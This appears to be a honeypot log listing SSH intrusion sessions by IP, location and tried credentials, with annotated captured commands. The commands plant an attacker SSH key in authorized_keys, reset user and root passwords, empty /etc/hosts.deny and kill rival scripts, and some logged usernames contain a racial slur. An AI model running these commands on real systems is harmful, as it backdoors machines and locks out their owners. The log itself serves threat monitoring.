$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test\nGIBIikNMzBJG\nGIBIikNMzBJG"|passwd|bash
$ Enter new UNIX password:
$ echo "test\nGIBIikNMzBJG\nGIBIikNMzBJG\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 monet_root_5 (93.127.202.131) β€” Paris, France Β· 1 session Β· 1 cmd
2026-05-24 08:19 EDT Β· as root/nobodyasked@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_70 (41.186.188.100) β€” Kigali, Rwanda Β· 2 sessions Β· 40 cmds
2026-05-24 07:56 EDT Β· as leonardo/leonardo, testuser/1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1\now7YF0vMczXg\now7YF0vMczXg"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1\now7YF0vMczXg\now7YF0vMczXg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "leonardo\n9IZQym3AtteU\n9IZQym3AtteU"|passwd|bash
$ echo "leonardo\n9IZQym3AtteU\n9IZQym3AtteU\n"|passwd
🎭 eagle_root_34 (198.135.51.189) β€” Dallas, United States Β· 1 session Β· 19 cmds
2026-05-24 08:08 EDT Β· as root/password1!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:3gChTyZ7G3cu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_4 (4.157.250.195) β€” Boydton, United States Β· 1 session Β· 20 cmds
2026-05-24 07:53 EDT Β· as testuser/1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1\nA7MsheoLdgk7\nA7MsheoLdgk7"|passwd|bash
$ Enter new UNIX password:
$ echo "1\nA7MsheoLdgk7\nA7MsheoLdgk7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_3 (162.250.123.178) β€” Secaucus, United States Β· 1 session Β· 1 cmd
2026-05-24 06:25 EDT Β· as swissmp/swissmp@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 bike_sol_3 (176.65.132.242) β€” Eygelshoven, The Netherlands Β· 1 session Β· 1 cmd
2026-05-24 06:13 EDT Β· as oracle/1qaz@WSX
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 yankee_root_30 (192.3.91.231) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-05-24 06:02 EDT Β· as vendas/1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\n3L9ipMwnGayW\n3L9ipMwnGayW"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\n3L9ipMwnGayW\n3L9ipMwnGayW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_64 (181.188.176.245) β€” La Paz, Bolivia Β· 1 session Β· 20 cmds
2026-05-24 04:33 EDT Β· as nigger/nigger
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "nigger\nrkP4iscuzasQ\nrkP4iscuzasQ"|passwd|bash
$ Enter new UNIX password:
$ echo "nigger\nrkP4iscuzasQ\nrkP4iscuzasQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_18 (114.216.2.84) β€” Nanjing, China Β· 1 session Β· 10 cmds
2026-05-24 04:17 EDT Β· as root/testing
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:jhoCXzS7L1hS"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
🎭 cowboy_5 (68.235.46.172) β€” Chicago, United States Β· 1 session Β· 20 cmds
2026-05-24 04:08 EDT Β· as user1/Aa123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Aa123456\nzLbTPTRJ28WY\nzLbTPTRJ28WY"|passwd|bash
$ Enter new UNIX password:
$ echo "Aa123456\nzLbTPTRJ28WY\nzLbTPTRJ28WY\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_76 (103.241.43.193) β€” Đinh CΓ΄ng HαΊ‘, Vietnam Β· 1 session Β· 19 cmds
2026-05-24 04:03 EDT Β· as root/Root12345
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:xNIVv91LASnF"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 crepe_root_11 (79.137.34.248) β€” Roubaix, France Β· 3 sessions Β· 59 cmds
2026-05-23 01:22 EDT Β· as plex/plex, root/root123456789, t2/t2
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "t2\n0CMYymnzcrBt\n0CMYymnzcrBt"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "t2\n0CMYymnzcrBt\n0CMYymnzcrBt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:VDcTQbrKQwbk"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "plex\naqnS9c7yPA1K\naqnS9c7yPA1K"|passwd|bash
$ echo "plex\naqnS9c7yPA1K\naqnS9c7yPA1K\n"|passwd
🎭 stein_root_20 (185.209.196.202) β€” Frankfurt am Main, Germany Β· 1 session Β· 19 cmds
2026-05-24 03:42 EDT Β· as root/AAaa1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:CXOp1V7ScLT9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_9 (187.77.113.131) β€” Jakarta, Indonesia Β· 1 session Β· 1 cmd
2026-05-24 03:29 EDT Β· as jimster/jimster2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 meatball_2 (185.213.154.182) β€” Gothenburg, Sweden Β· 1 session Β· 20 cmds
2026-05-24 03:27 EDT Β· as t2/t2
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "t2\nKzZ2dfYgILIj\nKzZ2dfYgILIj"|passwd|bash
$ Enter new UNIX password:
$ echo "t2\nKzZ2dfYgILIj\nKzZ2dfYgILIj\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_77 (194.127.167.96) β€” Tallinn, Estonia Β· 1 session Β· 19 cmds
2026-05-24 03:22 EDT Β· as root/root123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:xk5mh9A4HCp4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_37 (118.186.208.20) β€” Santa Clara, United States Β· 1 session Β· 20 cmds
2026-05-24 03:15 EDT Β· as backupuser/123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\noeltYYXAZ6vm\noeltYYXAZ6vm"|passwd|bash
$ Enter new UNIX password:
$ echo "123\noeltYYXAZ6vm\noeltYYXAZ6vm\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_68 (202.123.26.150) β€” Port Louis, Mauritius Β· 1 session Β· 19 cmds
2026-05-24 03:08 EDT Β· as root/demon
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
